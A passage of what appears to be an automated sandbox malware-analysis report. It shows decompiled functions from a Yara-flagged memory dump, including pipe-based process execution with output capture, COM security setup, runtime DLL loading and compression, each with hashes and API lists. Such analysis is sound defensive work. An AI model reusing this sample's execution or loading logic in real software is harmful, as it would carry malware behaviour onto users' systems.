                                    				if(_t32 == 0) {
                                    					L9:
                                    					return 1;
                                    				}
                                    				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
                                    				_v12 = _t16;
                                    				if(_t16 == 0) {
                                    					goto L9;
                                    				}
                                    				_t17 = GetProcAddress(_t32, "CryptGenRandom");
                                    				_v16 = _t17;
                                    				if(_t17 == 0) {
                                    					goto L9;
                                    				}
                                    				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
                                    				if(_t28 == 0) {
                                    					goto L9;
                                    				}
                                    				_push(0xf0000000);
                                    				_push(1);
                                    				_push(0);
                                    				_push(0);
                                    				_push( &_v8);
                                    				if(_v12() == 0) {
                                    					goto L9;
                                    				}
                                    				_t22 = _v16(_v8, 4,  &_v20);
                                    				 *_t28(_v8, 0);
                                    				if(_t22 == 0) {
                                    					goto L9;
                                    				}
                                    				_t29 = 0;
                                    				do {
                                    					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
                                    					_t29 = _t29 + 1;
                                    				} while (_t29 < 4);
                                    				 *_a4 = _t30;
                                    				return 0;
                                    			}

                                    APIs
                                    • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,000C765A,?,?,00000000,?), ref: 000D16CB
                                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 000D16E3
                                    • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 000D16F2
                                    • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 000D1701
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$HandleModule
                                    • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                    • API String ID: 667068680-129414566
                                    • Opcode ID: b65605c404d714bd0c7f6cdc014c82bbf85117c506fbb09874c6584b791f05d9
                                    • Instruction ID: d4b23a3b7ac53867078bef81616309f1c6fba6ca7a6e27690adaf6b111cb43cd
                                    • Opcode Fuzzy Hash: b65605c404d714bd0c7f6cdc014c82bbf85117c506fbb09874c6584b791f05d9
                                    • Instruction Fuzzy Hash: CF117332A05715BBEB615BEA8C84EEF7BF9AF45780B044066EA15F6350DE70D9008B74
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 87%
                                    			E000D2122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                                    				signed int _t12;
                                    				signed int _t13;
                                    				int _t15;
                                    				char* _t24;
                                    				char* _t26;
                                    				char* _t28;
                                    				char* _t29;
                                    				signed int _t40;
                                    				char* _t43;
                                    				char* _t45;
                                    				long long* _t47;
                                    
                                    				_t12 = _a20;
                                    				if(_t12 == 0) {
                                    					_t12 = 0x11;
                                    				}
                                    				_t26 = _a4;
                                    				_push(_t30);
                                    				 *_t47 = _a12;
                                    				_push(_t12);
                                    				_push("%.*g");
                                    				_push(_a8);
                                    				_push(_t26);
                                    				L000D2285();
                                    				_t40 = _t12;
                                    				if(_t40 < 0 || _t40 >= _a8) {
                                    					L19:
                                    					_t13 = _t12 | 0xffffffff;
                                    					goto L20;
                                    				} else {
                                    					L000D22CD();
                                    					_t15 =  *((intOrPtr*)( *_t12));
                                    					if(_t15 != 0x2e) {
                                    						_t24 = strchr(_t26, _t15);
                                    						if(_t24 != 0) {
                                    							 *_t24 = 0x2e;
                                    						}
                                    					}
                                    					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
                                    						L11:
                                    						_t43 = strchr(_t26, 0x65);
                                    						_t28 = _t43;
                                    						if(_t43 == 0) {
                                    							L18:
                                    							_t13 = _t40;
                                    							L20:
                                    							return _t13;
                                    						}
                                    						_t45 = _t43 + 1;
                                    						_t29 = _t28 + 2;
                                    						if( *_t45 == 0x2d) {
                                    							_t45 = _t29;
                                    						}
                                    						while( *_t29 == 0x30) {
                                    							_t29 = _t29 + 1;
                                    						}
                                    						if(_t29 != _t45) {
                                    							E000C8706(_t45, _t29, _t40 - _t29 + _a4);
                                    							_t40 = _t40 + _t45 - _t29;
                                    						}
                                    						goto L18;
                                    					} else {
                                    						_t6 = _t40 + 3; // 0xd09b2
                                    						_t12 = _t6;
                                    						if(_t12 >= _a8) {
                                    							goto L19;
                                    						}
                                    						_t26[_t40] = 0x302e;
                                    						( &(_t26[2]))[_t40] = 0;
                                    						_t40 = _t40 + 2;
                                    						goto L11;
                                    					}
                                    				}
                                    			}

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: strchr$_snprintflocaleconv
                                    • String ID: %.*g
                                    • API String ID: 1910550357-952554281
                                    • Opcode ID: 63f8e764568c4758d5cd2e90929b1f83a553a2e246058db04aab280671fdda3b
                                    • Instruction ID: f6153b53931c816f5cf90fdbc4519a87119c60c3e64c05486d80ffcae23a6d65
                                    • Opcode Fuzzy Hash: 63f8e764568c4758d5cd2e90929b1f83a553a2e246058db04aab280671fdda3b
                                    • Instruction Fuzzy Hash: B721337B6447427AD7254A289CC6BBA7BCCDF75320F158117FE109A382EA74EC4093B0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: _snprintfqsort
                                    • String ID: %I64d$false$null$true
                                    • API String ID: 756996078-4285102228
                                    • Opcode ID: 975c1893a9037985b582ba2435764dd0703f05b1ff4280b3f5148ca783a6603e
                                    • Instruction ID: 684f5bda4ccecb9397834d04cf382ea593694727c20340f8e6e8807afc758164
                                    • Opcode Fuzzy Hash: 975c1893a9037985b582ba2435764dd0703f05b1ff4280b3f5148ca783a6603e
                                    • Instruction Fuzzy Hash: 9EE16DB190030ABBDF119F64DC46FEF3BA9EF55344F10801AFD1996242EA31DA619BB0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • SysAllocString.OLEAUT32(00000000), ref: 000CD75C
                                    • SysAllocString.OLEAUT32(?), ref: 000CD764
                                    • SysAllocString.OLEAUT32(00000000), ref: 000CD778
                                    • SysFreeString.OLEAUT32(?), ref: 000CD7F3
                                    • SysFreeString.OLEAUT32(?), ref: 000CD7F6
                                    • SysFreeString.OLEAUT32(?), ref: 000CD7FB
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: String$AllocFree
                                    • String ID:
                                    • API String ID: 344208780-0
                                    • Opcode ID: 44420c4829f5bce14ab5226167260ede4167301a681125feba629d3f2e7185a8
                                    • Instruction ID: 3d9f34c9eecb127b5d7570106aa8ec4b723249f91a2853b660b7b91b34ec35e3
                                    • Opcode Fuzzy Hash: 44420c4829f5bce14ab5226167260ede4167301a681125feba629d3f2e7185a8
                                    • Instruction Fuzzy Hash: 5A21F875900218BFDB10DFA5CC88DAFBBBDEF48354B1044AAF505A7250EA71AE01CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: @$\u%04X$\u%04X\u%04X
                                    • API String ID: 0-2132903582
                                    • Opcode ID: 5c4a3dcad14d073debbc25b81825f3e4875a0567a15792a86c44d49d2579c3be
                                    • Instruction ID: 3547e2d1494ab77912d377d0d288dcf2f58bd85626a5821c1112c12d5c5f1659
                                    • Opcode Fuzzy Hash: 5c4a3dcad14d073debbc25b81825f3e4875a0567a15792a86c44d49d2579c3be
                                    • Instruction Fuzzy Hash: C5412C31600305A7EF785A68CC69BFEAA98DF84350F240027F98DD6356D661CD9197F1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 30%
                                    			E000CD523(void* __ecx) {
                                    				char _v8;
                                    				void* _v12;
                                    				char* _t15;
                                    				intOrPtr* _t16;
                                    				void* _t21;
                                    				intOrPtr* _t23;
                                    				intOrPtr* _t24;
                                    				intOrPtr* _t25;
                                    				void* _t30;
                                    				void* _t33;
                                    
                                    				_v12 = 0;
                                    				_v8 = 0;
                                    				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                                    				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                                    				_t15 =  &_v12;
                                    				__imp__CoCreateInstance(0xdb848, 0, 1, 0xdb858, _t15);
                                    				if(_t15 < 0) {
                                    					L5:
                                    					_t23 = _v8;
                                    					if(_t23 != 0) {
                                    						 *((intOrPtr*)( *_t23 + 8))(_t23);
                                    					}
                                    					_t24 = _v12;
                                    					if(_t24 != 0) {
                                    						 *((intOrPtr*)( *_t24 + 8))(_t24);
                                    					}
                                    					_t16 = 0;
                                    				} else {
                                    					__imp__#2(__ecx);
                                    					_t25 = _v12;
                                    					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                                    					if(_t21 < 0) {
                                    						goto L5;
                                    					} else {
                                    						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                                    						if(_t21 < 0) {
                                    							goto L5;
                                    						} else {
                                    							_t16 = E000C8604(8);
                                    							if(_t16 == 0) {
                                    								goto L5;
                                    							} else {
                                    								 *((intOrPtr*)(_t16 + 4)) = _v12;
                                    								 *_t16 = _v8;
                                    							}
                                    						}
                                    					}
                                    				}
                                    				return _t16;
                                    			}

                                    APIs
                                    • CoInitializeEx.OLE32(00000000,00000000), ref: 000CD536
                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000CD547
                                    • CoCreateInstance.OLE32(000DB848,00000000,00000001,000DB858,?), ref: 000CD55E
                                    • SysAllocString.OLEAUT32(00000000), ref: 000CD569
                                    • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 000CD594
                                      • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                                    • String ID:
                                    • API String ID: 1610782348-0
                                    • Opcode ID: 0c6d77743661c33b180230a493ba3699daa56de1679d93212f87755effbe83d7
                                    • Instruction ID: b52495c3964bc2eee305646e62cfc807d5bb65c34ee2dbb5966ceb0035954956
                                    • Opcode Fuzzy Hash: 0c6d77743661c33b180230a493ba3699daa56de1679d93212f87755effbe83d7
                                    • Instruction Fuzzy Hash: 3821EA74601245BFEB249B66DC4DE6FBFBCEFC6B15F10416EB901A6290DA709A01CB30
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 79%
                                    			E000D21FF(char* __eax, char** _a4, long long* _a8) {
                                    				char* _v8;
                                    				long long _v16;
                                    				char* _t9;
                                    				signed char _t11;
                                    				char** _t19;
                                    				char _t22;
                                    				long long _t32;
                                    				long long _t33;
                                    
                                    				_t9 = __eax;
                                    				L000D22CD();
                                    				_t19 = _a4;
                                    				_t22 =  *__eax;
                                    				if( *_t22 != 0x2e) {
                                    					_t9 = strchr( *_t19, 0x2e);
                                    					if(_t9 != 0) {
                                    						 *_t9 =  *_t22;
                                    					}
                                    				}
                                    				L000D2291();
                                    				 *_t9 =  *_t9 & 0x00000000;
                                    				_t11 = strtod( *_t19,  &_v8);
                                    				asm("fst qword [ebp-0xc]");
                                    				_t32 =  *0xd8250;
                                    				asm("fucomp st1");
                                    				asm("fnstsw ax");
                                    				if((_t11 & 0x00000044) != 0) {
                                    					L5:
                                    					st0 = _t32;
                                    					L000D2291();
                                    					if( *_t11 != 0x22) {
                                    						_t33 = _v16;
                                    						goto L8;
                                    					} else {
                                    						return _t11 | 0xffffffff;
                                    					}
                                    				} else {
                                    					_t33 =  *0xd8258;
                                    					asm("fucomp st1");
                                    					asm("fnstsw ax");
                                    					if((_t11 & 0x00000044) != 0) {
                                    						L8:
                                    						 *_a8 = _t33;
                                    						return 0;
                                    					} else {
                                    						goto L5;
                                    					}
                                    				}
                                    			}

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: _errno$localeconvstrchrstrtod
                                    • String ID:
                                    • API String ID: 1035490122-0
                                    • Opcode ID: aceb4110dc66301c355acdaa5611ac5f99a5334a39e134f6b0ec4c9c9ba2d16c
                                    • Instruction ID: 02ad6d30cf94f535e5970a8dc70227cda6efb6bc9110fd6e31c748a412764503
                                    • Opcode Fuzzy Hash: aceb4110dc66301c355acdaa5611ac5f99a5334a39e134f6b0ec4c9c9ba2d16c
                                    • Instruction Fuzzy Hash: A7012435804305FADB122F25E9026FD3BA4AFAA360F2041C2F980672A2CB358854DBB4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 73%
                                    			E000CA9B7(signed int __ecx) {
                                    				void* _v8;
                                    				void* _v12;
                                    				void* _v16;
                                    				void* _v20;
                                    				signed int _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				struct _SECURITY_ATTRIBUTES _v48;
                                    				intOrPtr _v60;
                                    				char _v64;
                                    				intOrPtr _v76;
                                    				intOrPtr _v80;
                                    				void* _v84;
                                    				short _v92;
                                    				intOrPtr _v96;
                                    				void _v140;
                                    				intOrPtr _t77;
                                    				void* _t79;
                                    				intOrPtr _t85;
                                    				intOrPtr _t87;
                                    				intOrPtr _t89;
                                    				intOrPtr _t92;
                                    				intOrPtr _t98;
                                    				intOrPtr _t100;
                                    				intOrPtr _t102;
                                    				long _t111;
                                    				intOrPtr _t115;
                                    				intOrPtr _t126;
                                    				void* _t127;
                                    				void* _t128;
                                    				void* _t129;
                                    				void* _t130;
                                    
                                    				_t111 = 0;
                                    				_v24 = __ecx;
                                    				_v12 = 0;
                                    				_v20 = 0;
                                    				_t127 = 0;
                                    				_v8 = 0;
                                    				_v16 = 0;
                                    				_v48.nLength = 0xc;
                                    				_v48.lpSecurityDescriptor = 0;
                                    				_v48.bInheritHandle = 1;
                                    				_v28 = 0;
                                    				memset( &_v140, 0, 0x44);
                                    				asm("stosd");
                                    				_t130 = _t129 + 0xc;
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
                                    					L18:
                                    					return 0;
                                    				}
                                    				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
                                    					L13:
                                    					E000C861A( &_v28, 0);
                                    					if(_v20 != 0) {
                                    						_t77 =  *0xde684; // 0x27bf8f0
                                    						 *((intOrPtr*)(_t77 + 0x30))(_v20);
                                    					}
                                    					if(_v8 != 0) {
                                    						_t115 =  *0xde684; // 0x27bf8f0
                                    						 *((intOrPtr*)(_t115 + 0x30))(_v8);
                                    					}
                                    					return _t111;
                                    				}
                                    				_t79 = _v16;
                                    				_v76 = _t79;
                                    				_v80 = _t79;
                                    				_v84 = _v12;
                                    				_v140 = 0x44;
                                    				_v96 = 0x101;
                                    				_v92 = 0;
                                    				_t126 = E000C8604(0x1001);
                                    				_v28 = _t126;
                                    				if(_t126 == 0) {
                                    					goto L18;
                                    				}
                                    				_push( &_v64);
                                    				_push( &_v140);
                                    				_t85 =  *0xde684; // 0x27bf8f0
                                    				_push(0);
                                    				_push(0);
                                    				_push(0x8000000);
                                    				_push(1);
                                    				_push(0);
                                    				_push(0);
                                    				_push(_v24);
                                    				_push(0);
                                    				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
                                    					goto L13;
                                    				}
                                    				_t87 =  *0xde684; // 0x27bf8f0
                                    				 *((intOrPtr*)(_t87 + 0x30))(_v12);
                                    				_t89 =  *0xde684; // 0x27bf8f0
                                    				 *((intOrPtr*)(_t89 + 0x30))(_v16);
                                    				_v24 = _v24 & 0;
                                    				do {
                                    					_t92 =  *0xde684; // 0x27bf8f0
                                    					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
                                    					 *((char*)(_v24 + _t126)) = 0;
                                    					if(_t111 == 0) {
                                    						_t127 = E000C91A6(_t126, 0);
                                    					} else {
                                    						_push(0);
                                    						_push(_t126);
                                    						_v32 = _t127;
                                    						_t127 = E000C9292(_t127);
                                    						E000C861A( &_v32, 0xffffffff);
                                    						_t130 = _t130 + 0x14;
                                    					}
                                    					_t111 = _t127;
                                    					_v32 = _t127;
                                    				} while (_v36 != 0);
                                    				_push( &_v36);
                                    				_push(E000CC379(_t127));
                                    				_t98 =  *0xde68c; // 0x27bfab8
                                    				_push(_t127);
                                    				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
                                    					L12:
                                    					_t100 =  *0xde684; // 0x27bf8f0
                                    					 *((intOrPtr*)(_t100 + 0x30))(_v64);
                                    					_t102 =  *0xde684; // 0x27bf8f0
                                    					 *((intOrPtr*)(_t102 + 0x30))(_v60);
                                    					goto L13;
                                    				}
                                    				_t128 = E000C9256(_t127);
                                    				if(_t128 == 0) {
                                    					goto L12;
                                    				}
                                    				E000C861A( &_v32, 0);
                                    				return _t128;
                                    			}

                                    APIs
                                    • memset.MSVCRT ref: 000CA9F4
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 000CAA18
                                    • CreatePipe.KERNEL32(000C65A9,?,0000000C,00000000), ref: 000CAA2F
                                      • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
                                      • Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CreateHeapPipe$AllocateFreememset
                                    • String ID: D
                                    • API String ID: 2365139273-2746444292
                                    • Opcode ID: a647d74f38189fc26be976d60fd895fc1f1cfc283b33b8330ee1ba72ca411e50
                                    • Instruction ID: ee5a40d96a8d170e39ef4db7aa177635ee1e57970e24f23723ed2304e9932c98
                                    • Opcode Fuzzy Hash: a647d74f38189fc26be976d60fd895fc1f1cfc283b33b8330ee1ba72ca411e50
                                    • Instruction Fuzzy Hash: 69512972E00209AFEB51DFA4CC85FEEB7B9EB08304F10416AF504E7292DB749E048B65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 89%
                                    			E000CC4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                    				char _v8;
                                    				char _v12;
                                    				void _v140;
                                    				signed char _t14;
                                    				char _t15;
                                    				intOrPtr _t20;
                                    				void* _t25;
                                    				intOrPtr _t26;
                                    				intOrPtr _t32;
                                    				WCHAR* _t34;
                                    				intOrPtr _t35;
                                    				struct HINSTANCE__* _t37;
                                    				int _t38;
                                    				intOrPtr _t46;
                                    				void* _t47;
                                    				intOrPtr _t50;
                                    				void* _t60;
                                    				void* _t61;
                                    				char _t62;
                                    				char* _t63;
                                    				void* _t65;
                                    				intOrPtr _t66;
                                    				char _t68;
                                    
                                    				_t65 = __esi;
                                    				_t61 = __edi;
                                    				_t47 = __ebx;
                                    				_t50 =  *0xde688; // 0xf0000
                                    				_t14 =  *(_t50 + 0x1898);
                                    				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
                                    					_t15 = E000C95E1(_t50, 0xb62);
                                    					_t66 =  *0xde688; // 0xf0000
                                    					_t62 = _t15;
                                    					_t67 = _t66 + 0xb0;
                                    					_v8 = _t62;
                                    					E000C9640( &_v140, 0x40, L"%08x", E000CD400(_t66 + 0xb0, E000CC379(_t66 + 0xb0), 0));
                                    					_t20 =  *0xde688; // 0xf0000
                                    					asm("sbb eax, eax");
                                    					_t25 = E000C95E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
                                    					_t63 = "\\";
                                    					_t26 =  *0xde688; // 0xf0000
                                    					_t68 = E000C92E5(_t26 + 0x1020);
                                    					_v12 = _t68;
                                    					E000C85D5( &_v8);
                                    					_t32 =  *0xde688; // 0xf0000
                                    					_t34 = E000C92E5(_t32 + 0x122a);
                                    					 *0xde784 = _t34;
                                    					_t35 =  *0xde684; // 0x27bf8f0
                                    					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
                                    					_t37 = LoadLibraryW( *0xde784);
                                    					 *0xde77c = _t37;
                                    					if(_t37 == 0) {
                                    						_t38 = 0;
                                    					} else {
                                    						_push(_t37);
                                    						_t60 = 0x28;
                                    						_t38 = E000CE171(0xdbb48, _t60);
                                    					}
                                    					 *0xde780 = _t38;
                                    					E000C861A( &_v12, 0xfffffffe);
                                    					memset( &_v140, 0, 0x80);
                                    					if( *0xde780 != 0) {
                                    						goto L10;
                                    					} else {
                                    						E000C861A(0xde784, 0xfffffffe);
                                    						goto L8;
                                    					}
                                    				} else {
                                    					L8:
                                    					if( *0xde780 == 0) {
                                    						_t46 =  *0xde6bc; // 0x27bfa18
                                    						 *0xde780 = _t46;
                                    					}
                                    					L10:
                                    					return 1;
                                    				}
                                    			}


                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoadmemset
                                    • String ID: %08x$dll
                                    • API String ID: 3406617148-2963171978
                                    • Opcode ID: d882a4f1289e6b93c371471509f1584e5831a8cbed4e1e9e3ca582eae478a6de
                                    • Instruction ID: 7bb140d26ea90620d688a4d55edfb562bb055213326fc88d9619b145c98fbc54
                                    • Opcode Fuzzy Hash: d882a4f1289e6b93c371471509f1584e5831a8cbed4e1e9e3ca582eae478a6de
                                    • Instruction Fuzzy Hash: A7319572A01244ABFB50AB64DC89F9E33ACEB54354F14402FF909DB292DB78D9458734
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 99%
                                    			E000D2D70(int _a4, signed int _a8) {
                                    				int _v8;
                                    				intOrPtr _v12;
                                    				signed int _v16;
                                    				void* __esi;
                                    				void* _t137;
                                    				signed int _t141;
                                    				intOrPtr* _t142;
                                    				signed int _t145;
                                    				signed int _t146;
                                    				intOrPtr _t151;
                                    				intOrPtr _t161;
                                    				intOrPtr _t162;
                                    				intOrPtr _t167;
                                    				intOrPtr _t170;
                                    				signed int _t172;
                                    				intOrPtr _t173;
                                    				int _t184;
                                    				intOrPtr _t185;
                                    				intOrPtr _t188;
                                    				signed int _t189;
                                    				void* _t195;
                                    				int _t202;
                                    				int _t208;
                                    				intOrPtr _t217;
                                    				signed int _t218;
                                    				int _t219;
                                    				intOrPtr _t220;
                                    				signed int _t221;
                                    				signed int _t222;
                                    				int _t224;
                                    				int _t225;
                                    				signed int _t227;
                                    				intOrPtr _t228;
                                    				int _t232;
                                    				int _t234;
                                    				signed int _t235;
                                    				int _t239;
                                    				void* _t240;
                                    				int _t245;
                                    				int _t252;
                                    				signed int _t253;
                                    				int _t254;
                                    				void* _t257;
                                    				void* _t258;
                                    				int _t259;
                                    				intOrPtr _t260;
                                    				int _t261;
                                    				signed int _t269;
                                    				signed int _t271;
                                    				intOrPtr* _t272;
                                    				void* _t273;
                                    
                                    				_t253 = _a8;
                                    				_t272 = _a4;
                                    				_t3 = _t272 + 0xc; // 0x452bf84d
                                    				_t4 = _t272 + 0x2c; // 0x8df075ff
                                    				_t228 =  *_t4;
                                    				_t137 =  *_t3 + 0xfffffffb;
                                    				_t229 =  <=  ? _t137 : _t228;
                                    				_v16 =  <=  ? _t137 : _t228;
                                    				_t269 = 0;
                                    				_a4 =  *((intOrPtr*)( *_t272 + 4));
                                    				asm("o16 nop [eax+eax]");
                                    				while(1) {
                                    					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
                                    					_t141 =  *_t8 + 0x2a >> 3;
                                    					_v12 = 0xffff;
                                    					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                                    					if(_t217 < _t141) {
                                    						break;
                                    					}
                                    					_t11 = _t272 + 0x6c; // 0xa1ec8b55
                                    					_t12 = _t272 + 0x5c; // 0x84e85000
                                    					_t245 =  *_t11 -  *_t12;
                                    					_v8 = _t245;
                                    					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                                    					_t247 =  <  ? _t195 : _v12;
                                    					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                                    					if(_t227 >= _v16) {
                                    						L7:
                                    						if(_t253 != 4) {
                                    							L10:
                                    							_t269 = 0;
                                    							__eflags = 0;
                                    						} else {
                                    							_t285 = _t227 - _t195;
                                    							if(_t227 != _t195) {
                                    								goto L10;
                                    							} else {
                                    								_t269 = _t253 - 3;
                                    							}
                                    						}
                                    						E000D5D90(_t272, _t272, 0, 0, _t269);
                                    						_t18 = _t272 + 0x14; // 0xc703f045
                                    						_t19 = _t272 + 8; // 0x8d000040
                                    						 *( *_t18 +  *_t19 - 4) = _t227;
                                    						_t22 = _t272 + 0x14; // 0xc703f045
                                    						_t23 = _t272 + 8; // 0x8d000040
                                    						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                                    						_t26 = _t272 + 0x14; // 0xc703f045
                                    						_t27 = _t272 + 8; // 0x8d000040
                                    						 *( *_t26 +  *_t27 - 2) =  !_t227;
                                    						_t30 = _t272 + 0x14; // 0xc703f045
                                    						_t31 = _t272 + 8; // 0x8d000040
                                    						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                                    						E000D4AF0(_t285,  *_t272);
                                    						_t202 = _v8;
                                    						_t273 = _t273 + 0x14;
                                    						if(_t202 != 0) {
                                    							_t208 =  >  ? _t227 : _t202;
                                    							_v8 = _t208;
                                    							_t36 = _t272 + 0x38; // 0xf47d8bff
                                    							_t37 = _t272 + 0x5c; // 0x84e85000
                                    							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                                    							_t273 = _t273 + 0xc;
                                    							_t252 = _v8;
                                    							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                                    							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                                    							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                                    							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                                    							_t227 = _t227 - _t252;
                                    						}
                                    						if(_t227 != 0) {
                                    							E000D4C30( *_t272,  *( *_t272 + 0xc), _t227);
                                    							_t273 = _t273 + 0xc;
                                    							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                                    							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                                    							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                                    						}
                                    						_t253 = _a8;
                                    						if(_t269 == 0) {
                                    							continue;
                                    						}
                                    					} else {
                                    						if(_t227 != 0 || _t253 == 4) {
                                    							if(_t253 != 0 && _t227 == _t195) {
                                    								goto L7;
                                    							}
                                    						}
                                    					}
                                    					break;
                                    				}
                                    				_t142 =  *_t272;
                                    				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                                    				_a4 = _t232;
                                    				if(_t232 == 0) {
                                    					_t83 = _t272 + 0x6c; // 0xa1ec8b55
                                    					_t254 =  *_t83;
                                    				} else {
                                    					_t59 = _t272 + 0x2c; // 0x8df075ff
                                    					_t224 =  *_t59;
                                    					if(_t232 < _t224) {
                                    						_t65 = _t272 + 0x3c; // 0x830cc483
                                    						_t66 = _t272 + 0x6c; // 0xa1ec8b55
                                    						_t260 =  *_t66;
                                    						__eflags =  *_t65 - _t260 - _t232;
                                    						if( *_t65 - _t260 <= _t232) {
                                    							_t67 = _t272 + 0x38; // 0xf47d8bff
                                    							_t261 = _t260 - _t224;
                                    							 *(_t272 + 0x6c) = _t261;
                                    							memcpy( *_t67,  *_t67 + _t224, _t261);
                                    							_t70 = _t272 + 0x16b0; // 0xdf750008
                                    							_t188 =  *_t70;
                                    							_t273 = _t273 + 0xc;
                                    							_t232 = _a4;
                                    							__eflags = _t188 - 2;
                                    							if(_t188 < 2) {
                                    								_t189 = _t188 + 1;
                                    								__eflags = _t189;
                                    								 *(_t272 + 0x16b0) = _t189;
                                    							}
                                    						}
                                    						_t73 = _t272 + 0x38; // 0xf47d8bff
                                    						_t74 = _t272 + 0x6c; // 0xa1ec8b55
                                    						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
                                    						_t225 = _a4;
                                    						_t273 = _t273 + 0xc;
                                    						_t76 = _t272 + 0x6c;
